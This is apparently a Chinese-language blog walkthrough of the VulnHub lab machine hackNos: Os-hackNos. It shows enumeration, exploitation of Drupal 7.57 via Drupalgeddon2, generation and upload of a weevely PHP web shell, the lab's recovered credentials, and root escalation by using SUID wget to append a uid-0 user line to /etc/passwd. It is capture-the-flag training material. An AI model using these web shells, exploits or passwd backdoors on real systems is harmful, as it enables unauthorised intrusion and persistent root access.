No.48-VulnHub-hackNos: Os-hackNos-Walkthrough渗透学习

**

VulnHub-hackNos: Os-hackNos-Walkthrough

**

靶机地址：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
靶机难度：中级（CTF）–本人做完觉得是初级！！
靶机发布日期：2019年11月27日
靶机描述：
Difficulty : Easy to Intermediate
Flag : 2 Flag first user And second root
Learning : exploit | Web Application | Enumeration | Privilege Escalation
Website : www.hackNos.com
mail : [email protected]
作者：大余
时间：2020-02-08
请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：

我们已经找到了此次CTF目标计算机IP地址：192.168.56.143

nmap发现开放了22、80端口…

80是个apache2…爆破看看…

发现drupal…

这边利用Droopescan进行扫描（Droopescan是一款基于插件的扫描器，可帮助安全研究人员发现Drupal，SilverStripe，Wordpress，Joomla（枚举版本信息和可利用URL地址）和Moodle的问题）
这边当然也可以用dirb，dirbuster等等，Droopescan比较好针对drupal…安装连接

二、提权

方法1：

drupal7.57的版本…
两种方法：一种直接利用MSF，一种利用python脚本…

MSF内核直接拿到shell…

方法2：

命令：git clone https://github.com/dreadlocked/Drupalgeddon2.git
先在github上下载该exp…如果执行和我一样报错，需要下载gem install highline 因为在运行该exp前，需要预装依赖包highline…看下图


成功获得www-data权限，但是这里想获得TTY必须利用木马工具…

命令：weevely generate cmd ./xiaoma.php
生成木马…然后上传上去即可…


命令：weevely http://192.168.56.143/drupal/xiaoma.php cmd
成功…

方法3：

直接在链接下载py，利用python3即可提权…https://www.exploit-db.com/exploits/44448
python3 -c ‘import pty; pty.spawn("/bin/bash")’ 获得TTY…不演示了…
1
1

成功获得user…

在html页面目录发现了alexander.txt…

一看就知道base64编码，解码…
这是brainfuck加密后的字符串…解码…

解码链接
james:Hacker@4514
我尝试在数据库看看能不能也找到密码…试试

发现数据库用户密码：cuppauser、Akrn@4514

这儿也能看到，但是无法解析…跳过
命令：find / -perm -u=s -type f 2>/dev/null

这里可以wget和sudo，但是sudo -l 需要密码…这里直接利用wget替换本地的passwd即可提权root…试试

命令：openssl passwd -1 -salt dayu dayu
命令：echo 'dayu:$1$dayu$/Cg/PH1Ew3w37.fLDfjX8/:0:0:root:/root:/bin/bash' >> /etc/passwd
在本地生成root权限用户dayu…开启本地服务

提权即可…

成功获得root权限并查看两个flag…

当然方法很多种，千变万化，理解原理即可！！！加油！！！

由于我们已经成功得到root权限查看flag，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。